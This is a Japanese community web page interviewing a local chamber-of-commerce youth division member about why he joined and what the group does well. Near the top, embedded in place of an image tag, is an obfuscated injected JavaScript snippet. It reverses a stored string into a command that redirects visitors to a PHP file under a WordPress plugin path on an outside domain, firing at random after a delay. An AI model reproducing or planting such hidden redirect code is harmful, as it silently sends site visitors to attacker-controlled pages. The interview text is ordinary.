新富町のしごと

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tomi.work/wp-content/uploads/2019/04/IMG_6754.jpg” alt=”” width=”1600″ height=”1067″ class=”aligncenter size-full wp-image-131″ />

あの集団に聞けば地域の誰かと繋がれる

—商工会青年部に入ろうと思ったきっかけは何ですか?

齋田:もともとウチの会社は商工会に所属していて、父はOB会、母は女性部に入っていたので、私も青年部に入った方が良いかなというような軽い気持ちで平成30年5月から入部しました。。

今でも分からないことが多いので、定例会議の時にはとにかく質問するようにしています。

—商工会青年部の良さとは何ですか?

齋田:私も入部したばかりで、あまり全体の方向性をよく理解していないのですが、やっぱり部員が地元のことをよく知っているということだと思います。

地元で何か困りごとや、人や物などを探す時など、部内で聞けば必ず誰かが繋がっていて。

だから、ことを起こすとなれば何でもできる集団なんじゃないかな。
まだ、前例のないことなどはまだまだ受け入れられづらい感覚もありますが、その辺がクリアできれば、可能性は一気に広がると思います。

—逆に青年部の課題は何だと思いますか?

齋田:頑張っている人がもっと日の目を見れるようになることですかね。
例えば、商工会の佐藤くんは私から見て頑張ってるなと感じるんです。

みんなで同じ方向を向いて活動できるようになると、地域がもっと面白くなると思うんですよね。